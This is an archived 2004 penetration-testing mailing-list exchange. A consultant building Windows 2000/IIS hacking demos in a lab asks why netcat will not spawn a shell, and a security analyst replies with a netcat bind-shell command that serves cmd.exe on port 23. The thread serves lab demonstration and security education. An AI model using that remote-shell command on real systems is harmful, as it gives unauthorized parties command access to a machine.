From: Grissett, Chris CONT Ciber (Chris.Grissett.Ciber@usarc-emh2.army.mil)
Date: Fri Jun 11 2004 - 10:49:30 EDT
Try this command on the remote machine
nc -l -p 23 -t -e cmd.exe
This allows nc to listen on port 23 for connections. When a connection is
made it will spawn a cmd[dos] shell, or whatever program you want to exec.
Hope that helps. If that fails, you can really impress the execs by using
knoppix-std (http://knoppix-std.org), to do all your hacking demos. Or if
you'd like, you could give me access to your lab, and Id do it for you. I'm
kidding, of course I couldn't do that, plus it would violate numerous laws
and ethics :) Are you familiar with linux?
Christopher Grissett
Security Analyst
Network Enterprise Security Team
-----Original Message-----
From: raza sharif [mailto:raza@raza.demon.co.uk]
Sent: Friday, June 11, 2004 7:42 AM
To: pen-test@securityfocus.com
Subject: Hacking Demo and Test Lab
Hi Folks ,
Im doing some advanced Hacking Demos for management and also Corporates etc.
I have a installed windows 2000 server and iis 5.0 on VMWARE GSX server.
Im using Webdav and other exploits that all basically should spawn a shell
using netcat.
Im using XP as my attacking machine.
Prob at the moment is Netcat will not spawn a shell regardless of what i
try.
Any ideas ? i checked the install it is windows 2000 500.1295 no reference
to service packs etc. it's a default install.
Also what are good demo's etc to run to show real hacking on windows 2000 ,
iis etc..that i can get to work
thanks
Raza
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:56 EDT